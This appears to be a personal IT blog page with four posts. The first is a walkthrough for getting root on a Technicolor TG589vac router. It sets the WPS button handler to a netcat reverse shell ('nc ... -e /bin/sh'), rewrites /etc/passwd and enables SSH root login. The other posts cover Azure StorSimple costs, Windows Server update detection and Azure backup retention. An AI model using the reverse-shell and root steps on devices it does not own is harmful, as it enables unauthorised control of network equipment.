Tuesday, 15 May 2018

LAN side root on Technicolor MediaAccess TG589vac

Here is a method for gaining root access to your Technicolor TG589vac (and probably other models of) router.

Unfortunately this will only work on European models that have SSH enabled with an engineer account enabled.

Tested working on firmware revision 17.2.0278

It's a bit more involved than the older methods but here goes:

First set up a machine listening with netcat (make a note of it's IP)

nc -lvvp 4444

Set up the WPS button to connect back to your listening machine. Log into the engineer account using SSH. Password is printed on the label as access code.

get uci.button.button.@wps.handler
set uci.button.button.@wps.handler 'nc <IP ADDRESS> 4444 -e /bin/sh'
get uci.button.button.@wps.handler

Push the WPS button on the router (on the 589 it's the one on the side, visible in the image up top)

Congrats, you now have a root shell.

Once logged in you can set up root login via ssh. The following will read the passwd file, then modify the root shell from /bin/false to /bin/ash

cat /etc/passwd
sed -i "1s/\/bin\/false/\/bin\/ash/" /etc/passwd
cat /etc/passwd

Make sure the 2nd output of the passwd file has the correct root shell.

Next, configure dropbear to allow root login via SSH

uci set dropbear.lan.RootLogin='1'
uci set dropbear.lan.RootPasswordAuth='on'
uci commit

You have to restart dropbear

/etc/init.d/dropbear restart

root password is root :)

Login via SSH, set new root password

root@dsldevice:~# passwd root
New password:
Retype password:
Password for root changed by root

Set WPS button back using UCI

uci set button.wps.handler='wps_button_pressed.sh'
uci commit

Monday, 12 March 2018

StorSimple Upload Calculator

Some time ago, I played around with the on-premise Azure StorSimple virtual appliance. Unfortunately, I happened to pick the new blob storage account in cool, RA-GRS mode. This happened to have a very expensive "per 10k write" cost and cost quite a bit of money when I uploaded 750 GiB of data.

Since then, we have seen Azure storage transaction costs come way down, especially on the v1 general purpose storage account type.

To help you get an estimate of storage and transaction costs for uploading bulk data into a StorSimple device, I've created a calculator here.

To begin, simply key in a GiB storage amount that you plan to upload, the per 10k write and per GB cost for your region and the calculator will give a guide to the expected transaction and storage cost to upload the data.

The calculator does not calculate transactions for day to day access, nor does it include cloud snapshot transactions or storage.

Be aware, the 512 KiB chunk size will reduce transaction costs, but will also significantly reduce deduplication. The Microsoft pricing page explains this.

This, version 1 of the calculator requires you to key in the per 10k writes and per GB cost for your chosen region and storage account type. It defaults to v1, LRS, North Europe, GBP costs as of the time of writing. I've purposely left out the currency symbol as it should work with most currencies as-is.

Hopefully with some additional time, I'll be able to add a pull-down box to choose storage account type and location and have it automatically enter those costs for you.

Thursday, 8 March 2018

Windows Server 2012 R2 & 2016 updates showing as not applicable

Due to Spectre and Meltdown patches causing problems with various anti virus vendors, Microsoft has added a registry key check for ALL patches on Windows Server for January and February 2018 (not just the Spectre and Meltdown patches)

If you find yourself in the situation where your severs are not detecting the latest update rollups then check this Microsoft post:


Most AV vendors are properly setting this flag in the registry, but some will not and if you have some servers which do not have AV for legitimate reasons you may find yourself unable to patch these machines.

The server will simply not show the update rollups from WSUS or Microsoft Update servers. In WSUS, they will show as 'not applicable' for the server.

Setting the flag resolves the issue, but unless you are checking that servers are getting updated properly this may not be noticed. In WSUS, since the updates are not applicable, the server will show as fully patched, not requiring the updates which is a bad situation to be in.

Friday, 9 February 2018

How to change backup retention for an Azure VM in Recovery Services Vault

This seemed a little bit hidden in the portal and I couldn't find any guides online. So, here is how to change the backup retention for an Azure virtual machine within the portal.

Hidden away here in the Azure Backup FAQ, Microsoft states:

"When a new policy is applied, schedule and retention of the new policy is followed. If retention is extended, existing recovery points are marked to keep them as per new policy. If retention is reduced, they are marked for pruning in the next cleanup job and subsequently deleted."

This means you will delete older backups when the policy is changed. Additionally, you keep existing backups according to your new policy.

How to change your policy

  • Log into the portal and find your Recovery Services Vault.

  • Click on the vault, then find 'Backup policies' in the menu blade.

  • Click '+ Add', select a policy type, fill in the policy details and click Create.

  • Once the policy is created, go back to the main Recovery Services Vault tab and click the vault.

  • Find 'Backup Items' in the menu blade.

  • Click Azure Virtual Machine.

  • Click on the VM you want to change.

  • Click the settings button.

  • Click 'Backup Policy'

  • Choose the new backup policy and click Save.

Once the Deployments show as succeeded in the notifications area, go back to the 'Backup policies' blade from the start, click the policy, then click 'Associated Items' to check that the correct virtual machines have been assigned this policy.